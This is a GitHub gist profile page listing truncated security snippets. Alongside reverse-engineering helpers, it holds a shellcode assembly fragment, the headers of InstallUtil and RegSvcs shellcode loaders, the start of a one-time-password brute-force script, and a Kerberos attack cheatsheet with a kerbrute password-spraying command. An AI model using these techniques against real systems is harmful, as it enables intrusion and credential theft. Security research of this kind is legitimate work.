Skip to content

Instantly share code, notes, and snippets.

View merlinxcy's full-sized avatar
🎯
Focusing

Xeldax merlinxcy

🎯
Focusing
176 followers · 278 following
View GitHub Profile
@merlinxcy
merlinxcy / ida_script_print_hex.py
Created July 18, 2019 06:44
ida python print hex data
start = 0x4007E0
end = 0x400800
to_list_int = []
to_list_str = []
for i in range(start,end,1):
print(Byte(i))
print(hex(Byte(i)))
to_list_int.append(Byte(i))
to_list_str.append(hex(Byte(i)))
@merlinxcy
merlinxcy / android7_certs.sh
Created September 4, 2019 02:40
androidcerts7.0_for_catch_burp
#!/bin/sh
mkdir certs
cp /usr/lib/ssl/openssl.cnf ./
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca -config openssl.cnf
openssl rsa -in server.key -inform pem -out server.key.der -outform der
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt
@merlinxcy
merlinxcy / generate_ssl_cert.sh
Created November 18, 2019 08:39
generate_ssl_cert.sh
./gencert.sh
Enter your domain [www.example.com]: www.test.com
Create server key...
Generating RSA private key, 1024 bit long modulus
.................++++++
.....++++++
e is 65537 (0x10001)
Enter pass phrase for www.test.com.key:输入口令
Verifying - Enter pass phrase for www.test.com.key:输入口令
Create server certificate signing request...
@merlinxcy
merlinxcy / jadx.sh
Created December 16, 2019 02:52
reverse the dex history
root@kali:~/temp# cat test.sh
#!/bin/sh
for i in `ls *.jar`;do
~/tools/jadx/bin/jadx -d out-$i $i
echo $i
done;
root@kali:~/temp# cat test2.sh
#!/bin/sh
for i in `ls *.dex`;do
~/tools/jadx/bin/jadx -d out-$i $i
@merlinxcy
merlinxcy / test.asm
Created December 20, 2019 07:58
study asm
; global _start
; section .text
; _start:
; jmp short call_shellcode
; shellcode:
; pop esi
; xor ebx,ebx
; mov byte[esi+9],bl
; mov dword[esi+10],esi
@merlinxcy
merlinxcy / RegsvcsRegasm_regsvcs.cs
Last active March 3, 2020 06:14
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
@merlinxcy
merlinxcy / InstallUtil-Shellcode-cs
Created March 10, 2020 04:15 — forked from lithackr/InstallUtil-Shellcode-cs
From https://gist.github.com/subTee/408d980d88515a539672
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@merlinxcy
merlinxcy / gist:46dc0bb819101566baa70e5bc3b73f5d
Created June 2, 2020 08:15
brute_onepass_for_csrf_Token.sh
#!/bin/bash
HOST=192.168.10.130
ACTIVATE=activate.php
ME=$(basename $0)
function token() {
local COOKIE=""
if [ -e cookie ]; then
COOKIE=" -b cookie"
@merlinxcy
merlinxcy / Ubuntu中设置JAVA_HOME路径.sh
Created June 15, 2021 06:21
Ubuntu中设置JAVA_HOME路径
export JAVA_HOME=/usr/lib/jvm/jdk-13
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH
@merlinxcy
merlinxcy / kerberos_attacks_cheatsheet.md
Created September 17, 2021 02:27 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: